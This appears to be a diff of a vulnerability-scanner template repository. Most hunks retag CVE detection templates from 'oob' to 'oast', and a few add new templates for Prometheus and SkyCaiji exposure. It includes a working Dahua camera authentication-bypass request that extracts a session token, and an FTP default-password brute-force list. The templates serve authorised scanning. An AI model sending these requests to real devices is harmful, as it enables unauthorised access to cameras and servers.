@ -9,7 +9,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
|
||||
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
|
||||
- https://docs.gitlab.com/ee/api/lint.html
|
||||
tags: cve,cve2021,gitlab,ssrf,oob
|
||||
tags: cve,cve2021,gitlab,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.60
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website.
|
||||
severity: critical
|
||||
reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a
|
||||
tags: cve,cve2021,wordpress,lfi,ssrf,oob
|
||||
tags: cve,cve2021,wordpress,lfi,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft
|
||||
reference:
|
||||
- https://proxylogon.com/#timeline
|
||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
|
||||
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||
tags: cve,cve2021,tenda,rce,oob
|
||||
tags: cve,cve2021,tenda,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-32305
|
||||
- https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
|
||||
tags: cve,cve2021,websvn,rce,oob
|
||||
tags: cve,cve2021,websvn,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -12,7 +12,7 @@ info:
|
|||
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
|
||||
- https://www.linuxlz.com/aqld/2331.html
|
||||
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
|
||||
tags: cve,cve2021,nodejs,rce,oob
|
||||
tags: cve,cve2021,nodejs,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
|
|
|
@ -0,0 +1,54 @@
|
|||
id: CVE-2021-33044
|
||||
|
||||
info:
|
||||
name: Dahua IPC/VTH/VTO devices Authentication Bypass
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
|
||||
reference:
|
||||
- https://github.com/dorkerdevil/CVE-2021-33044
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
|
||||
- https://seclists.org/fulldisclosure/2021/Oct/13
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-33044
|
||||
cwe-id: CWE-287
|
||||
tags: dahua,cve,cve2021,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /RPC2_Login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Connection: close
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Origin: http://{{Hostname}}/
|
||||
Referer: http://{{Hostname}}/
|
||||
|
||||
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "true"
|
||||
- "id"
|
||||
- "params"
|
||||
- "session"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
part: body
|
||||
regex:
|
||||
- ',"result":true,"session":"([a-z]+)"\}'
|
|
@ -10,7 +10,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-33357
|
||||
- https://github.com/RaspAP/raspap-webgui
|
||||
description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
|
||||
tags: cve,cve2021,rce,raspap,oob
|
||||
tags: cve,cve2021,rce,raspap,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
severity: high
|
||||
reference:
|
||||
- https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
|
||||
tags: cve,cve2021,geutebruck,rce,oob
|
||||
tags: cve,cve2021,geutebruck,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.20
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-3577
|
||||
cwe-id: CWE-78
|
||||
tags: cve,cve2021,rce,oob,motorola,iot
|
||||
tags: cve,cve2021,rce,oast,motorola,iot
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -32,3 +32,7 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "set_city_timezone"
|
|
@ -7,7 +7,7 @@ info:
|
|||
severity: critical
|
||||
reference:
|
||||
- https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/
|
||||
tags: cve,cve2021,sureline,rce,oob
|
||||
tags: cve,cve2021,sureline,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://firzen.de/building-a-poc-for-cve-2021-40438
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40438
|
||||
tags: cve,cve2021,ssrf,apache,mod-proxy,oob
|
||||
tags: cve,cve2021,ssrf,apache,mod-proxy,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9.00
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: prometheus-config-endpoint
|
||||
|
||||
info:
|
||||
name: Prometheus config API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder <secret> (although this still leaks the username).
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/status/config"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'job_name:'
|
||||
- '{"status":"success","data":'
|
||||
- 'targets:'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
|
@ -0,0 +1,37 @@
|
|||
id: prometheus-flags-endpoint
|
||||
|
||||
info:
|
||||
name: Prometheus flags API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username.
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/status/flags"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '"data":'
|
||||
- '"config.file":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: web_admin_enabled
|
||||
regex:
|
||||
- '\"web\.enable\-admin\-api\"\: \"true\"'
|
|
@ -0,0 +1,31 @@
|
|||
id: prometheus-targets-endpoint
|
||||
|
||||
info:
|
||||
name: Prometheus targets API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge.
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/targets"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '{"status":"success","data":'
|
||||
- 'Labels'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
|
@ -3,7 +3,7 @@ info:
|
|||
name: Keycloak Json File
|
||||
author: oppsec
|
||||
severity: info
|
||||
tags: exposure
|
||||
tags: exposure,keycloak,config
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -15,6 +15,7 @@ requests:
|
|||
- "{{BaseURL}}/server/storage/"
|
||||
- "{{BaseURL}}/intikal/storage/"
|
||||
- "{{BaseURL}}/elocker_old/storage/"
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application.
|
||||
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php
|
||||
tags: targa,ssrf,oob,iot
|
||||
tags: targa,ssrf,oast,iot
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: info
|
||||
description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin.
|
||||
reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684
|
||||
tags: cloudflare,misconfig,oob
|
||||
tags: cloudflare,misconfig,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Linkerd SSRF detection
|
||||
author: dudez
|
||||
severity: high
|
||||
tags: ssrf,linkerd,oob
|
||||
tags: ssrf,linkerd,oast
|
||||
reference: https://twitter.com/nirvana_msu/status/1084144955034165248
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: skycaiji-install
|
||||
|
||||
info:
|
||||
name: SkyCaiji Exposed Installation
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
tags: tech,skycaiji,exposure,misconfig
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?s=/install/index/index'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>蓝天采集器 SkyCaiji 安装</title>'
|
||||
- 'https://www.skycaiji.com'
|
||||
- '<a href="/index.php?s=/Install/Index/step1" class="btn btn-lg btn-success">'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: KabirSuda
|
||||
severity: medium
|
||||
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
|
||||
tags: misconfig,oob,oauth
|
||||
tags: misconfig,oast,oauth
|
||||
reference: https://portswigger.net/research/hidden-oauth-attack-vectors
|
||||
|
||||
requests:
|
||||
|
|
|
@ -16,6 +16,7 @@ requests:
|
|||
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/zp-core/setup/index.php'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -10,10 +10,12 @@ network:
|
|||
|
||||
- inputs:
|
||||
- data: "USER {{username}}\r\nPASS {{password}}\r\n"
|
||||
|
||||
host:
|
||||
- "{{Hostname}}:21"
|
||||
- "{{Hostname}}"
|
||||
|
||||
attack: clusterbomb
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
|
@ -27,9 +29,7 @@ network:
|
|||
- pass1
|
||||
- stingray
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "230"
|
||||
- "230 Login successful"
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
|
||||
- https://github.com/assetnote/blind-ssrf-chains#confluence
|
||||
tags: confluence,atlassian,ssrf,jira,oob
|
||||
tags: confluence,atlassian,ssrf,jira,oast
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
|
||||
- https://www.freebuf.com/vuls/208339.html
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.freebuf.com/vuls/208339.html
|
||||
- https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: info
|
||||
description: The remote server fetched a spoofed URL from the request headers.
|
||||
reference: https://github.com/PortSwigger/collaborator-everywhere
|
||||
tags: oob,ssrf,generic
|
||||
tags: oast,ssrf,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: info
|
||||
description: The remote server fetched a spoofed URL from the request parameters.
|
||||
reference: https://github.com/PortSwigger/collaborator-everywhere
|
||||
tags: oob,ssrf,generic
|
||||
tags: oast,ssrf,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: info
|
||||
description: The remote server fetched a spoofed DNS Name from the request.
|
||||
reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
|
||||
tags: oob,ssrf,generic
|
||||
tags: oast,ssrf,generic
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint.
|
||||
reference: https://www.exploit-db.com/exploits/16275
|
||||
tags: router,exposure,iot
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: EWEBS casmain.xgi arbitrary file reading vulnerability
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: A vulnerability in EWEBS's 'casmain.xgi' endpoint allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter.
|
||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
|
||||
tags: ewebs,lfi
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://www.exploit-db.com/exploits/46074
|
||||
tags: hashicorp,rce,oob,intrusive
|
||||
tags: hashicorp,rce,oast,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: HomeAutomation v3.3.2 Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: A vulnerability in the HomeAutomation product allows remote unauthenticated attackers to inject a redirect URL via the 'api.php' endpoint and the 'redirect' parameter.
|
||||
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php
|
||||
tags: iot,redirect
|
||||
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection.
|
||||
reference:
|
||||
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||
tags: mirai,rce,oob
|
||||
tags: mirai,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
reference:
|
||||
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
|
||||
tags: netgear,rce,oob,router
|
||||
tags: netgear,rce,oast,router
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
|
||||
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||
tags: optiLink,rce,oob
|
||||
tags: optiLink,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
|
||||
reference: https://www.exploit-db.com/exploits/49344
|
||||
tags: sar2html,rce,oob
|
||||
tags: sar2html,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50098
|
||||
tags: visualtools,rce,oob
|
||||
tags: visualtools,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
reference:
|
||||
- https://www.adminxe.com/2183.html
|
||||
tags: zimbra,ssrf,oob
|
||||
tags: zimbra,ssrf,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Wordpress XMLRPC Pingback detection
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: wordpress,ssrf,oob
|
||||
tags: wordpress,ssrf,oast
|
||||
reference:
|
||||
- https://github.com/dorkerdevil/rpckiller
|
||||
- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
|
||||
|
|
|
@ -9,4 +9,4 @@ workflows:
|
|||
- template: exposed-panels/rabbitmq-dashboard.yaml
|
||||
|
||||
subtemplates:
|
||||
- template: default-logins/rabbitmq/rabbitmq-default-admin.yaml
|
||||
- template: default-logins/rabbitmq/
|
Loading…
Reference in New Issue